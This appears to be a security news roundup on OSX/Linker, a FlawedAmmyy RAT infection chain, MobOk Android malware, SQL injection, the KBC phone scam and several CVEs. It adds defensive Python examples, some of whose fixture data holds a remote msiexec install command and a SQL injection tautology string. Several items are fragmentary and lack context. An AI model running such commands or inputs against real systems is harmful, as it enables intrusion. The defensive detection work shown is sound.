A new Mac malware dubbed OSX/Linker leverages the recently disclosed macOS Gatekeeper vulnerability to get executed on the victim’s machine without user permission or warnings.
The macOS Gatekeeper zero-day vulnerability was publicly disclosed by Filippo Cavallarin on May 24, after Apple missed its 90-day deadline to fix the vulnerability.
The vulnerability resides in how Gatekeeper treats apps loaded from a network share or the Internet. Gatekeeper, by default, considers apps loaded from external drives and network shares as coming from safe locations and allows them to run without user consent. “As per-design, Gatekeeper considers both external drives and network shares as safe locations, and it allows any application they contain to run. By combining this design with two legitimate features of MacOS X, it will result in the complete deceivement of the intended behavior,” reads Filippo Cavallarin’s blog post.
Apple’s Gatekeeper is a mechanism that checks the status of code signing certificates and verifies the developer signature before allowing an application to execute.
Intego’s malware research team noted a few attempts by OSX/Linker to leverage the zero-day flaw in macOS Gatekeeper using a disk image file (.dmg), the format commonly used to distribute Mac software.
Anonymous users uploaded the samples to VirusTotal; Intego spotted four such samples. The first sample was uploaded by an anonymous user from Israel, and within seven minutes the other three samples were uploaded from the United States.
Intego believes all the files were uploaded by the same user, who possibly forgot to mask the IP address when uploading the first sample. The IP referenced by the disk images’ symlinks has since been taken down, either by the hosting company or voluntarily. “It is not clear whether any of these specific disk images were ever part of an in-the-wild malware campaign. It is possible that these disk images, or subsequent disk images, may have been used in small-scale or targeted attacks, but so far this remains unknown.” As usual, the threat actors behind the campaign disguised the disk images as Adobe Flash Player installers to trick Mac users.
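The disk images described above carry symlinks that point outside the image, at a network location. A defender triaging such a .dmg wants to see those links before anything is launched. The following is an added example, not code from Intego or from the article, that walks a mounted image and reports every symlink whose target lies outside the image, flagging targets under the /Volumes and /net prefixes (the /net automounter prefix is an assumption about the environment, not something the article states). The demo image it builds is a constructed sample, and the share name and installer name in it are made up.

```python
import os
import tempfile
from pathlib import Path

# Path prefixes under which macOS exposes external drives and network shares.
# /Volumes is the standard mount point; /net is the automounter prefix (an
# assumption about the environment, not something the article states).
NETWORK_PREFIXES = ("/Volumes/", "/net/")


def find_external_symlinks(image_root, network_prefixes=NETWORK_PREFIXES):
    """Walk a mounted disk image and report every symlink whose target lies
    outside the image. Each finding records whether the target sits under a
    network/external-volume prefix, which is the pattern worth escalating."""
    root = Path(image_root).resolve()
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):  # followlinks=False by default
        for name in dirnames + filenames:
            link = Path(dirpath) / name
            if not link.is_symlink():
                continue
            raw_target = os.readlink(link)
            # Relative targets are resolved against the directory holding the link.
            abs_target = os.path.normpath(
                raw_target if os.path.isabs(raw_target) else os.path.join(dirpath, raw_target)
            )
            if abs_target.startswith(str(root) + os.sep):
                continue  # stays inside the image: not interesting
            findings.append({
                "link": str(link.relative_to(root)),
                "target": abs_target,
                "network": abs_target.startswith(network_prefixes),
            })
    return sorted(findings, key=lambda f: f["link"])


def build_demo_image():
    """Create a throwaway directory standing in for a mounted .dmg (constructed
    sample, not a real malware image). Contents: a README with a relative
    symlink to it, the usual 'Applications' shortcut, and a symlink named like
    an installer that points at a network share (share name is made up)."""
    root = tempfile.mkdtemp(prefix="demo_dmg_")
    Path(root, "README.txt").write_text("demo\n")
    os.symlink("README.txt", os.path.join(root, "Read Me"))          # relative, inside image
    os.symlink("/Applications", os.path.join(root, "Applications"))  # absolute, outside, local
    os.symlink("/Volumes/EXAMPLE-SHARE/Installer.app",               # absolute, network share
               os.path.join(root, "Flash Player Installer.app"))
    return root


def demo():
    """Build the constructed image and return the findings for it."""
    return find_external_symlinks(build_demo_image())


if __name__ == "__main__":
    for f in demo():
        print(("NETWORK " if f["network"] else "local   ") + f["link"] + " -> " + f["target"])
```

Run against a real image with `find_external_symlinks("/Volumes/<mounted image>")`; an "Applications" link to the local /Applications folder is normal for installer images, while a link that resolves under a network prefix is the case to treat as hostile.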
Microsoft uncovered a new campaign with a sophisticated infection chain delivering the notorious FlawedAmmyy RAT as its final payload. The attack starts with an email that carries an .XLS attachment and has its body written in Korean.
Previous campaigns involving the FlawedAmmyy RAT were carried out by the TA505 threat actors. Upon successful execution, the backdoor lets an attacker control the machine remotely, manage files, and capture the screen.
How the Infection Occurs
The malicious .XLS file is delivered through email. When the file is opened, it automatically runs a macro that launches the Windows Installer, msiexec.exe, which is used to download and install MSI and MSP packages.
The downloaded MSI archive contains a digitally signed executable that is extracted and executed. It decrypts and runs another executable, wsus.exe, in memory, which in turn decrypts and runs the final payload in memory.
The final payload, delivered directly in memory, is FlawedAmmyy, according to Microsoft Security Intelligence. FlawedAmmyy is digitally signed using a code signing certificate issued by Thawte to the company Dream Body Limited. It appears the RAT was signed and timestamped on June 19, and the samples were detected on June 22.
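The chain above has an observable first hop: an Office application spawning msiexec.exe, which then fetches a package from a URL. The following is an added example, not Microsoft's code or a rule the article supplies, that runs two detection rules over a constructed sample of process-creation events in a Sysmon-style JSON-lines layout (host names, PIDs, paths and the URL are all made up; `example.invalid` is a reserved name) and correlates the hosts where both rules fire.

```python
import json
import re

# Office applications whose macros are a common first stage; a child msiexec.exe
# launched by one of these is the pattern described in the infection chain.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}

# Constructed sample of process-creation events (Sysmon-style field names, one
# JSON object per line). Host names, PIDs, paths and the URL are made up.
SAMPLE_LOG = r'''
{"host": "WS01", "pid": 1001, "ppid": 900, "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "\"EXCEL.EXE\" C:\\Users\\ann\\Downloads\\invoice.xls"}
{"host": "WS01", "pid": 1002, "ppid": 1001, "image": "C:\\Windows\\System32\\msiexec.exe", "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "cmdline": "msiexec.exe /i http://package.example.invalid/update.msi /q"}
{"host": "WS02", "pid": 2001, "ppid": 1500, "image": "C:\\Windows\\System32\\msiexec.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "msiexec.exe /i C:\\Users\\bob\\Downloads\\setup.msi"}
{"host": "WS02", "pid": 2002, "ppid": 1600, "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "\"WINWORD.EXE\" report.docx"}
'''


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of the rules a single process-creation event matches."""
    hits = []
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    # Rule 1: the Windows Installer launched directly by an Office application.
    if image == "msiexec.exe" and parent in OFFICE_APPS:
        hits.append("office_app_spawned_msiexec")
    # Rule 2: msiexec told to install a package straight from a URL.
    if image == "msiexec.exe" and re.search(r"https?://", event["cmdline"], re.IGNORECASE):
        hits.append("msiexec_remote_package_url")
    return hits


def scan(log_text):
    """Parse JSON-lines events and return (host, pid, rule) alerts in log order."""
    alerts = []
    for line in log_text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        for rule in evaluate(event):
            alerts.append((event["host"], event["pid"], rule))
    return alerts


def hosts_with_full_chain(alerts):
    """Hosts on which both rules fired: the strongest signal for this chain."""
    by_host = {}
    for host, _pid, rule in alerts:
        by_host.setdefault(host, set()).add(rule)
    return {h for h, rules in by_host.items()
            if {"office_app_spawned_msiexec", "msiexec_remote_package_url"} <= rules}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for host, pid, rule in found:
        print(f"{host} pid={pid} {rule}")
    print("full chain on:", sorted(hosts_with_full_chain(found)))
```

The local install on WS02 triggers neither rule, which is the point of keeping the parent-process condition: msiexec.exe itself is ubiquitous, and only its combination with an Office parent or a remote package source is worth an alert.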
The FlawedAmmyy RAT functions:
⏺ Remote Desktop control
⏺ File system manager
Earlier this year TA505 distributed the FlawedAmmyy RAT via weaponized MS Excel documents with malicious Excel 4.0 macros, which are hard to detect with standard security controls.
Last October cybercriminals used IQY files to deliver FlawedAmmyy malware and executed the backdoor through a PowerShell process.
C|EH is the world’s most advanced ethical hacking course, covering 20 of the most important security domains any individual will need when planning to beef up the information security posture of their organization.
A full offensive hacking course with hands-on, real-world labs. It aims to build penetration testing skills and to immerse students in advanced hacking tools and techniques. Students will be able to define, scan, and exploit different types of vulnerabilities by mastering ethical hacking methodology.
A new session starts on July 3 in Tripoli, Lebanon: https://darebne.com/course/ec-council-certified-ethical-hacker-ceh-v10/
Researchers discovered fake photo editing apps used by cybercriminals to launch MobOk malware, which takes complete control of the infected Android device.
Threat actors are targeting Android users through the legitimate Google Play Store, hiding this malware in apps to steal money by subscribing users to premium services.
Two photo editor apps were uncovered, ‘Pink Camera’ and ‘Pink Camera 2’, which had been installed nearly 10,000 times.
These apps were uploaded to the Google Play Store to steal personal data from victims’ Android devices and use it to sign them up for paid subscription services.
Researchers described MobOk as a powerful backdoor, since it has sophisticated capabilities to take almost complete control over the infected Android device.
The developers of the Pink Camera apps added evasion techniques to hide suspicious activity and avoid detection. The apps included genuine photo editing functionality, and users trusted them because they were downloaded from the Google Play Store.
Once the app is installed on the victim’s phone, it asks the user for notification access permission and then performs malicious activities in the background.
The primary purpose of these apps is to subscribe the user to paid mobile subscription services.
MobOk Malware Infection Process
After infection, MobOk starts collecting device information, including the phone number, and the attackers send a webpage for a premium subscription that requires the user to pay for the service.
Meanwhile, the malware opens a hidden browser in the background, inserts the victim’s already-collected phone number into the “subscribe” field and confirms the purchase.
Since MobOk already has complete control of the victim’s phone, it grabs the SMS verification code notification and enters the code on behalf of the user.
24 June, 2019
According to Tor, “We expect to be able to publish the Android release this weekend. In the meantime, Android users should use the safer or safest security levels. The security level on Android can be changed by going in the menu on the right of the URL bar and selecting Security Settings.”
SQL injection is a technique in which an attacker exploits non-validated input vulnerabilities to inject SQL commands through a web application, which are then executed by the backend database.
It is very easy: all one needs is the advanced operators of the Google search engine to locate results containing the relevant strings. SQL injection is currently ranked #1 on the OWASP Top 10 chart, which means it is responsible for a large portion of public disclosures and security breaches.
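The root cause named above is non-validated input being spliced into a query. The following is an added example, not from the article, that puts a vulnerable lookup beside its hardened form using Python's built-in sqlite3 module against an in-memory table (the table, its rows and the function names are all constructed for the demo). The vulnerable function concatenates the input into the SQL string; the safe one passes it as a bound parameter, so the database never parses user input as SQL.

```python
import sqlite3


def make_db():
    """Constructed demo database: three users in an in-memory SQLite table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def lookup_user_vulnerable(conn, username):
    """Defective pattern: the caller's string is spliced straight into the SQL.
    Any quote character in `username` changes the structure of the query."""
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_user_safe(conn, username):
    """Hardened pattern: the input is bound as a parameter. SQLite receives the
    query shape and the value separately, so the value can never become SQL."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


def demo():
    """Run both lookups with a normal name and with a classic tautology input
    (constructed test string), returning the row counts for comparison."""
    conn = make_db()
    tautology = "' OR '1'='1"
    return {
        "vulnerable_normal": len(lookup_user_vulnerable(conn, "alice")),
        "vulnerable_tautology": len(lookup_user_vulnerable(conn, tautology)),
        "safe_normal": len(lookup_user_safe(conn, "alice")),
        "safe_tautology": len(lookup_user_safe(conn, tautology)),
    }


if __name__ == "__main__":
    for name, count in demo().items():
        print(f"{name}: {count} row(s)")
```

The vulnerable lookup returns every row for the tautology input because the quote closes the literal and the rest of the string becomes part of the WHERE clause; the parameterized lookup returns nothing, since no user is literally named `' OR '1'='1`. Input validation is still worthwhile as defence in depth, but parameter binding is the control that removes the injection itself.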
The United States military launched a cyber attack on the Iranian military computers used to control Iran’s missiles, after Iran shot down a $240 million U.S. drone.
The attack mainly targeted Iranian military computer systems, with the approval of U.S. President Trump, and disabled computer systems controlling rocket and missile launchers.
An Iran-based spy group, the Iranian Revolutionary Guard Corps, has tracked and attacked military and civilian ships for several years and also helps the Iranian military identify intrusions into its airspace.
U.S. intelligence carefully tracked the persistent cyber attacks and their targets and kept issuing alerts to government and military networks.
Last Thursday the Iranian military shot down the expensive U.S. military drone; in response, Trump authorized the U.S. military to strike back against Iranian military computers.
In the recent past, Iran-based cyberespionage groups attempted to compromise various government and military networks, as well as other sectors including finance, oil and gas, by sending spear-phishing emails. Multiple private U.S. cybersecurity firms reported this.
U.S. officials told the Wall Street Journal they fear heightened escalations not only in physical space but in cyberspace as well.
Iran’s cyber intelligence capabilities are not as sophisticated as those of the U.S., but Iran is continuously building up its intelligence system to strike back against any attacks.
The National Security Council declined to comment on the Iranian cyber group or the U.S. Cyber Command response.
A Pentagon spokesperson, quoted by Yahoo News, said, “as a matter of policy and for operational security, we do not discuss cyberspace operations, intelligence or planning.” Iranian intelligence experts are also capable of hijacking digital systems used in drones, and potentially even in ships, to spoof the GPS location of the device and plug in false coordinates. “They’ve been thinking a lot about drone capture because we’ve been flying drones over them for years,” says James Lewis, a cyber expert from Washington, D.C.
23 June, 2019
First, a buffer overflow vulnerability (CVE-2019-5439) that resides in ReadFrame (demux/avi/avi.c) allows a remote user to create specially crafted AVI or MKV files that trigger a heap buffer overflow when loaded on a targeted system.
According to Delhi Police, the KBC scam is nothing new, and it happens every year while the show is being aired. What is alarming is that a large number of people are still falling for this scam because people ‘blindly believe their luck’. Here are some things one must keep in mind to stay alert about the scam:
1. The scammers make random calls to anyone in their database and sound convincing to the victim; people from all backgrounds fall for it.
2. If not by voice call, the scammers try to reach their victims over WhatsApp to lure them.
3. The scammer usually congratulates the victim, claiming to be calling from the KBC team to inform them of the prize money they have won by participating in the quiz.
4. When the victim denies taking part in the quiz, the scammers manage to convince them by saying, “Your family member might have taken part and called from your number.”
5. Most of the scam calls come from numbers beginning with ‘0092’, as per police complaints.
6. Scammers sometimes introduce themselves as the KBC team and ask simple questions to make the victim ‘win’. Alternatively, they say that the victim’s mobile number has been selected in a lucky draw.
7. The real scam begins after the victim is declared a winner of the KBC contest. The victim is then asked to deposit somewhere between Rs 8,000 and Rs 10,000 as tax money or a processing fee so that the KBC team can send the prize money of Rs 25 lakh or Rs 30 lakh. The processing fee is usually requested in the form of bank drafts.
8. The comparatively low ‘processing fee’ of around Rs 10,000 makes people fall for the scam easily, as the claimed prize money is around Rs 25 lakh or even higher.
According to the Microsoft update, “The security update addresses the vulnerability by correcting how Outlook for Android parses specially crafted email messages.” The vulnerability is tracked as CVE-2019-1105, and the Cybersecurity and Infrastructure Security Agency (CISA) urged users and administrators to review the Microsoft Security Advisory and apply the necessary update.